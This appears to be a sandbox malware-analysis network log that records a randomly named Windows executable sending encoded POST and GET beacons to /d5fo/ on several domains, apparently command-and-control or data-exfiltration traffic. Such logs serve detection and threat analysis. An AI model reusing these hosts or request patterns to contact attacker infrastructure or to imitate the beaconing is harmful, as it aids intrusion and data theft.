Jul 25, 2024 12:09:20.120373964 CEST	305	IN	HTTP/1.1 405 Not Allowed date: Thu, 25 Jul 2024 10:09:20 GMT content-type: text/html content-length: 154 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49737	91.195.240.19	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:09:22.000355005 CEST	1778	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.bieniastest.xyz Origin: http://www.bieniastest.xyz Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1241 Referer: http://www.bieniastest.xyz/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 47 4f 74 4e 6e 31 2f 6a 39 34 36 47 6e 69 66 52 6f 37 55 67 4c 33 59 63 61 37 65 54 7a 64 50 35 42 71 73 4a 71 71 75 2f 79 31 56 68 46 2f 4c 2f 52 72 4a 53 31 67 51 32 49 64 74 44 46 63 6f 73 41 32 4c 37 34 44 43 57 46 6f 66 4b 45 32 4f 72 36 67 6c 6e 78 4d 76 32 7a 74 58 6d 63 41 78 4b 65 2f 2f 6f 70 56 4c 59 4f 68 51 70 46 54 50 37 74 78 30 6c 4d 68 65 66 61 4d 76 33 58 68 61 35 4f 33 4c 63 6c 58 4e 78 7a 6a 6f 56 63 70 33 45 66 33 72 38 43 68 52 76 42 66 32 6d 51 62 7a 48 78 4f 59 36 6a 64 6d 62 54 55 61 79 6f 39 6f 4e 78 58 64 48 2b 50 63 39 62 76 2f 6f 79 41 77 65 73 35 67 59 7a 72 4b 6d 69 78 71 45 58 46 54 61 6f 2b 71 2b 4c 53 33 50 6a 2b 79 33 44 6b 47 68 39 76 76 4c 76 69 2f 58 64 44 45 4c 32 37 6f 4a 66 5a 72 37 46 42 77 50 4c 68 56 62 72 38 45 52 63 30 55 39 6e 4e 54 61 45 37 4e 32 69 35 58 52 47 38 75 50 4e 62 49 45 39 32 57 36 65 55 42 30 67 44 70 4e 75 47 32 71 2b 65 58 34 62 46 6f 66 74 75 67 55 74 55 6c 33 38 66 2f 31 4b 56 74 55 51 57 76 72 45 77 6d 6c 57 67 44 55 48 [TRUNCATED] Data Ascii: 7b7D=GOtNn1/j946GnifRo7UgL3Yca7eTzdP5BqsJqqu/y1VhF/L/RrJS1gQ2IdtDFcosA2L74DCWFofKE2Or6glnxMv2ztXmcAxKe//opVLYOhQpFTP7tx0lMhefaMv3Xha5O3LclXNxzjoVcp3Ef3r8ChRvBf2mQbzHxOY6jdmbTUayo9oNxXdH+Pc9bv/oyAwes5gYzrKmixqEXFTao+q+LS3Pj+y3DkGh9vvLvi/XdDEL27oJfZr7FBwPLhVbr8ERc0U9nNTaE7N2i5XRG8uPNbIE92W6eUB0gDpNuG2q+eX4bFoftugUtUl38f/1KVtUQWvrEwmlWgDUH4fI+5q0NZ4N7xrNwAzinB9Rg9ogFoyNNKnAhN7jK3Udfv85Ltn6JXKfUVehyT1FgkJv+iL3CSHu8TyGKgIwIOp9+okaVbo4C+/0QiTp3emymguUULjVqu4Qo8uwKt6B+lQWYsNCUd7YlLOVFy+BAhFSLev+/cBMuKPjWQXatxHjB4CWtFo6fDRnN85ysQtzcaN3I21YRERI101WoQC0xe2w6DcuP6YBCOzcpPUJqreNg4M3CDMGGOUT/0qq9H7/OqUFaoR+Iev5rXdaP76TgCBuk8NAMR74rm58BYZGAhKuPVggKRnKRxrwMpANaxi0MSqD7Z0JVYjVBM4BhN4b5c1INsI7PlG10yjRq8RI5X4ifHODujAfMqNaWARCql8acCoN8eXGcYWMGlvAnvGRnQYgylqOeCeGwZUFOfvs0FM1A8iW0COfgLIramdD/+3NE2wG9jjjDWsxfkWQqyLv7eZkKOekc0Bn6wAAiJyCaIoS0cv9WnPqO6tzL7tu6LvuR1ZokzMkDYpnZtC+UlsAPVmrd44S+cnHSjIwCNnNJoLXzKZTE5fvPsgQwg3tJujq6/DYELjh9Q3nLt6RHQ7+JcvMgnpN3daehH1lPMFcV7wJ2YRMX/qZaza4sUZaMRgQ6XoMN9qZO2LlV6Y52SYTA6IbZU8Shj5fYng [TRUNCATED]
Jul 25, 2024 12:09:22.690968990 CEST	305	IN	HTTP/1.1 405 Not Allowed date: Thu, 25 Jul 2024 10:09:22 GMT content-type: text/html content-length: 154 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49738	91.195.240.19	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:09:24.534774065 CEST	481	OUT	GET /d5fo/?7b7D=LMFtkAbNwZ2elB2GqME+IyQxX7DpzdHWKaIeqICYjgo7Pf7uTIFX4zBwXYBOYcYwGUmItxrSVLCWdjm98wNi/v/M/fTrXywXbqzKp2nVAwJXJwrN8i8cZj3fKe75XwP3Sw==&jlx=Zd48SBF0d HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.bieniastest.xyz Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Jul 25, 2024 12:09:25.225109100 CEST	1236	IN	HTTP/1.1 200 OK date: Thu, 25 Jul 2024 10:09:25 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_UCPjUaIAOnXxNuwf3ROrgWtCVcePpAJy9jSyrLqqWCgqT3gRQjWF37pxzw6NlXt9EpYVqis+6hDfYxWf+Jnt6g== last-modified: Thu, 25 Jul 2024 10:09:25 GMT x-cache-miss-from: parking-c957d8b5b-29ch4 server: Parking/1.0 connection: close Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 55 43 50 6a 55 61 49 41 4f 6e 58 78 4e 75 77 66 33 52 4f 72 67 57 74 43 56 63 65 50 70 41 4a 79 39 6a 53 79 72 4c 71 71 57 43 67 71 54 33 67 52 51 6a 57 46 33 37 70 78 7a 77 36 4e 6c 58 74 39 45 70 59 56 71 69 73 2b 36 68 44 66 59 78 57 66 2b 4a 6e 74 36 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 62 69 65 6e 69 61 73 74 65 73 74 2e 78 79 7a 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 62 69 65 6e [TRUNCATED] Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_UCPjUaIAOnXxNuwf3ROrgWtCVcePpAJy9jSyrLqqWCgqT3gRQjWF37pxzw6NlXt9EpYVqis+6hDfYxWf+Jnt6g==><head><meta charset="utf-8"><title>bieniastest.xyz - bieniastest Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="bieniastest.xyz is your first and best source for all of the informatio
Jul 25, 2024 12:09:25.225183010 CEST	1236	IN	Data Raw: 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 Data Ascii: n youre looking for. From general topics to more of what you would expect to find here, bieniastest.xyz has it all. We hope you find what you are searchi1062ng for!"><link rel="icon" type="image/png" href="//img.
Jul 25, 2024 12:09:25.225198030 CEST	1236	IN	Data Raw: 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 Data Ascii: ontrols]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transfo
Jul 25, 2024 12:09:25.225723028 CEST	1236	IN	Data Raw: 75 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 74 65 6d 70 6c 61 74 65 7b 64 69 73 Data Ascii: u{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.con
Jul 25, 2024 12:09:25.225733995 CEST	1236	IN	Data Raw: 6d 65 72 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 20 61 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 Data Ascii: mer__content-text{color:#949494}.container-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint__content-link{font-size:10px;color:
Jul 25, 2024 12:09:25.225744963 CEST	1236	IN	Data Raw: 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6c 61 72 67 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 20 61 7b 63 6f Data Ascii: ;margin-bottom:5px;margin-left:0px;font-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transition:all .3s;-moz-transition:all
Jul 25, 2024 12:09:25.226946115 CEST	1236	IN	Data Raw: 23 32 31 38 38 33 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 73 2d 73 6d 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 Data Ascii: #218838;color:#fff;font-size:initial}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:medium}.btn--secondary:ho
Jul 25, 2024 12:09:25.226958036 CEST	1236	IN	Data Raw: 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 7d 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 65 31 36 32 65 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c Data Ascii: nsform:translateX(26px)}body{background-color:#0e162e;font-family:Arial,Helvetica,Verdana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;padding-left:5%;padding-right:5%;padding-b
Jul 25, 2024 12:09:25.226969957 CEST	1236	IN	Data Raw: 63 61 6c 65 58 28 2d 31 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 7a 2d 69 6e 64 65 78 3a 2d 31 3b 74 6f 70 3a 35 30 70 78 3b 70 6f Data Ascii: caleX(-1);-webkit-transform:scaleX(-1);transform:scaleX(-1);z-index:-1;top:50px;position:inherit}.container-content--lp{min-height:720px}.container-content--rp{min-height:820px}.container-content--rp .container-content__right,.container-conten
Jul 25, 2024 12:09:25.227315903 CEST	1236	IN	Data Raw: 3a 23 39 66 64 38 30 31 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 0d 0a 35 37 36 0d Data Ascii: :#9fd801}.two-tier-ads-list__list-element-link:link,.two-tier-ads-list__list576-element-link:visited{text-decoration:underline}.two-tier-ads-list__list-element-link:hover,.two-tier-ads-list__list-element-link:active,.two-tier-ads-list__lis
Jul 25, 2024 12:09:25.230032921 CEST	247	IN	Data Raw: 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 63 6f 6c 6f 72 3a 23 38 38 38 7d 0a 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e Data Ascii: sans-serif;font-size:16px;color:#888} </style><script type="text/javascript"> var dto = {"uiOptimize":false,"singleDomainName":"bieniastest.xyz","domainName":"bieniastest.xyz","domainPrice":0,"domainCurrency":"","adultFlag":false,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49739	66.96.162.141	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:09:30.582905054 CEST	756	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.energysecrets.online Origin: http://www.energysecrets.online Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Referer: http://www.energysecrets.online/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 6a 4d 52 69 5a 51 45 32 78 42 64 61 62 61 2b 64 2f 4e 72 77 62 72 5a 7a 34 32 57 32 66 2b 31 45 6a 38 45 70 59 58 73 43 55 5a 5a 51 46 56 66 74 35 73 46 57 72 44 78 47 68 46 4a 78 76 4e 44 2b 77 6d 76 35 45 4b 41 36 65 4d 34 34 30 75 6d 6b 6b 52 7a 49 34 4b 4b 46 73 54 48 44 53 61 38 62 46 32 56 4f 6f 75 6e 51 6c 55 6e 36 62 43 4b 4f 4e 6c 45 76 4f 4a 77 63 78 30 47 42 48 4b 30 38 72 59 62 33 62 54 44 2b 33 6d 38 35 6b 31 36 58 44 63 33 48 45 45 67 56 71 65 4d 6b 2f 45 48 41 57 4a 59 2b 55 4b 48 4f 75 73 74 42 77 44 72 6e 75 4d 69 78 63 76 6b 6f 51 58 6a 57 73 57 32 56 58 33 69 4f 49 53 49 3d Data Ascii: 7b7D=jMRiZQE2xBdaba+d/NrwbrZz42W2f+1Ej8EpYXsCUZZQFVft5sFWrDxGhFJxvND+wmv5EKA6eM440umkkRzI4KKFsTHDSa8bF2VOounQlUn6bCKONlEvOJwcx0GBHK08rYb3bTD+3m85k16XDc3HEEgVqeMk/EHAWJY+UKHOustBwDrnuMixcvkoQXjWsW2VX3iOISI=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49740	66.96.162.141	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:09:33.113418102 CEST	776	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.energysecrets.online Origin: http://www.energysecrets.online Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Referer: http://www.energysecrets.online/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 6a 4d 52 69 5a 51 45 32 78 42 64 61 5a 35 6d 64 73 75 7a 77 58 62 5a 77 32 57 57 32 45 75 31 59 6a 38 49 70 59 53 55 53 54 72 39 51 63 30 76 74 34 6f 52 57 73 44 78 47 35 31 4a 30 73 39 44 6c 77 6d 6a 78 45 50 6f 36 65 4d 45 34 30 75 32 6b 6b 43 62 4c 35 61 4b 48 71 54 47 46 66 36 38 62 46 32 56 4f 6f 75 7a 32 6c 55 2f 36 62 33 43 4f 66 55 45 67 48 70 77 62 35 55 47 42 44 4b 30 34 72 59 62 56 62 53 66 51 33 6b 55 35 6b 77 57 58 44 4e 33 45 52 55 67 54 6c 2b 4e 49 32 33 61 6f 57 6f 6b 69 53 49 65 2f 75 4d 42 65 34 56 47 4e 30 75 71 5a 50 50 49 51 41 45 72 68 39 6d 58 38 4e 55 79 2b 57 46 64 76 51 79 44 6d 30 42 68 6f 48 2b 34 2b 67 30 58 68 7a 6b 33 58 Data Ascii: 7b7D=jMRiZQE2xBdaZ5mdsuzwXbZw2WW2Eu1Yj8IpYSUSTr9Qc0vt4oRWsDxG51J0s9DlwmjxEPo6eME40u2kkCbL5aKHqTGFf68bF2VOouz2lU/6b3COfUEgHpwb5UGBDK04rYbVbSfQ3kU5kwWXDN3ERUgTl+NI23aoWokiSIe/uMBe4VGN0uqZPPIQAErh9mX8NUy+WFdvQyDm0BhoH+4+g0Xhzk3X
Jul 25, 2024 12:09:33.629857063 CEST	1087	IN	HTTP/1.1 404 Not Found Date: Thu, 25 Jul 2024 10:09:33 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 [TRUNCATED] Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49741	66.96.162.141	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:09:35.707304955 CEST	1793	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.energysecrets.online Origin: http://www.energysecrets.online Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1241 Referer: http://www.energysecrets.online/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 6a 4d 52 69 5a 51 45 32 78 42 64 61 5a 35 6d 64 73 75 7a 77 58 62 5a 77 32 57 57 32 45 75 31 59 6a 38 49 70 59 53 55 53 54 72 31 51 63 69 37 74 35 4b 35 57 74 44 78 47 6e 46 4a 31 73 39 44 6b 77 6d 37 31 45 50 6b 31 65 4a 41 34 32 4d 4f 6b 30 6a 62 4c 33 71 4b 48 6d 7a 47 56 53 61 39 44 46 77 31 4b 6f 75 6a 32 6c 55 2f 36 62 32 79 4f 50 56 45 67 4c 4a 77 63 78 30 47 64 48 4b 31 74 72 59 44 76 62 53 72 75 77 56 30 35 6c 55 32 58 46 2f 50 45 4d 6b 67 52 78 65 4e 51 32 33 57 33 57 6f 34 75 53 4a 36 5a 75 4e 31 65 72 69 4c 35 78 2b 7a 46 52 4f 55 41 4f 7a 76 59 72 79 54 52 54 56 75 65 53 30 39 49 61 44 44 66 36 52 68 59 54 71 31 67 6a 67 72 52 78 6b 6d 76 4e 63 36 4c 6f 30 63 67 4a 37 57 73 41 52 4f 46 2f 34 52 50 37 71 33 2b 53 54 79 79 42 45 39 2f 71 4c 4f 31 58 6b 4a 63 31 42 73 35 30 6d 35 78 64 4a 70 75 2b 56 4e 53 62 79 6f 4c 2b 48 41 79 42 58 77 37 33 6d 68 6d 30 77 70 35 4e 70 4c 55 6f 38 32 66 76 4d 68 37 6f 4c 51 7a 61 50 62 43 53 61 62 6c 57 56 52 34 47 4a 70 4d 4c 36 53 73 7a [TRUNCATED] Data Ascii: 7b7D=jMRiZQE2xBdaZ5mdsuzwXbZw2WW2Eu1Yj8IpYSUSTr1Qci7t5K5WtDxGnFJ1s9Dkwm71EPk1eJA42MOk0jbL3qKHmzGVSa9DFw1Kouj2lU/6b2yOPVEgLJwcx0GdHK1trYDvbSruwV05lU2XF/PEMkgRxeNQ23W3Wo4uSJ6ZuN1eriL5x+zFROUAOzvYryTRTVueS09IaDDf6RhYTq1gjgrRxkmvNc6Lo0cgJ7WsAROF/4RP7q3+STyyBE9/qLO1XkJc1Bs50m5xdJpu+VNSbyoL+HAyBXw73mhm0wp5NpLUo82fvMh7oLQzaPbCSablWVR4GJpML6SszOBxa0EF09fG0MASym6YPEHkNKV4q1mnHGnQPVeaDUWycsgfZlvskccbBcca65hpnViPHYYiIinPpAOTavpOsDfzf0SbXGTSxDp8Gc4QX0e2RmNcPdq00k8G1oRqsIzIOuOclHNCc7gIZGPmtW2bzBLCxSlntS9myxTRifF/TA/TDYKXDr5k480KfQOoXgXdNF8o7o2SSuTdAflJ0r87bhdJtgvFL9dE5zBDzFUXlZ9EIoAnjflzailaSlbNfQMwKwZY/uYu9IWGK2b7EGjPRSksAemJuKmClaKvKKi4Cy2bLjJkvbtVngA4+gwudjxPFvpXxYvTcGToNBHJrNdm4KMf6WgoIFyVnp2+kFEXQ9lFqMXDZOSWkUtvH5NJCJpaesi7Kzd/ZrozDdSLR9bCvC8JEDWkIKb6HSBnQT6k3BtJunYycucdrdIUoqn7Hx9Pvvm7/byaMoL1KQxM20mK1YAxl/yIMsTJavFyOxA0IRFCrTD+rtk6WfppgSl/A47pFeU26fDz4e2tIyt8Zt/Btl3t1sW/o4TGzLH3SFqFQohMibHv1xTI4UJq133/cDMXSiysc0x87sNya7mz5+sUojN093OJmMrK8lhsw99Qt0JHjWumq8X+ZsyMPPPCtpsEIDta5V/huLzkveVBl+kTnz0qJ9UaYVK4H1r [TRUNCATED]
